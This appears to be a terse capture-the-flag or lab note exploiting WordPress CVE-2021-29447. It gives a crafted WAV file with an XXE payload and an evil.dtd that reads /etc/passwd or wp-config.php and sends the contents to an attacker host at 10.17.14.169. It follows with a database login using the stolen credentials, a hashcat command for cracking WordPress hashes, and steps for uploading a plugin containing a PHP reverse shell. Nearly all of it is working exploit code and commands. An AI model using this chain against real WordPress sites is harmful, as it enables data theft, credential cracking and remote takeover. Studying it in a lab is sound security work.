# Wordpress CVE-2021-29447

wordpress running in php 8, upload .wav file\
patched in wp 5.7.1\ <br>

#### php\://filter/zlib.inflate/resource=test.deflated

\
\
• .wav file\
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00\<?xml version="1.0"?>\<!DOCTYPE ANY\[\<!ENTITY % remote SYSTEM '"'"'[http://10.17.14.169:8000/evil.dtd'"'"'>%remote;\]>\x00](http://10.17.14.169:8000/evil.dtd'"'"'>%remote;]>\x00)' > payload.wav\
\
\
• evil.dtd\
\<!ENTITY % file SYSTEM "php\://filter/read=convert.base64-encode/resource=/etc/passwd">\
\<!ENTITY % eval "\<!ENTITY \&#x25; exfiltrate SYSTEM '[http://10.17.14.169:8000/?a=%file;'](http://10.17.14.169:8000/?a=%file;%27)>">\
%eval;\
%exfiltrate;\
\
\
OR\
\
\<!ENTITY % file SYSTEM "php\://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">\
\<!ENTITY % eval "\<!ENTITY \&#x25; exfiltrate SYSTEM '[http://10.17.14.169:8000/?a=%file;'](http://10.17.14.169:8000/?a=%file;%27)>">\
%eval;\
%exfiltrate;\
\
\
• decode zlib\
\<?php echo zlib\_decode(base64\_decode('...')); ?>\
\
thedarktangent:\[redacted]\
\
mysql -h 10.10.96.36 -P 3306 -u thedarktangent -p\[redacted]\
\
hashcat.bin -m 400 -a0 user.hash rockyou.txt\
\
\- wp users\
corp-001:\[redacted]\
test-corp:\[redacted]\
\
• creating vulnerable wordpress plugin in zip format\
1\. 2 files required - php-reverse-shell and plugin info \[both php files]\
2\. zip and upload them \[zip wp file1 file2]\
3\. Access php-reverse-shell on URL - \<IP>/wp-content/plugins/wp/php-reverse-shell.php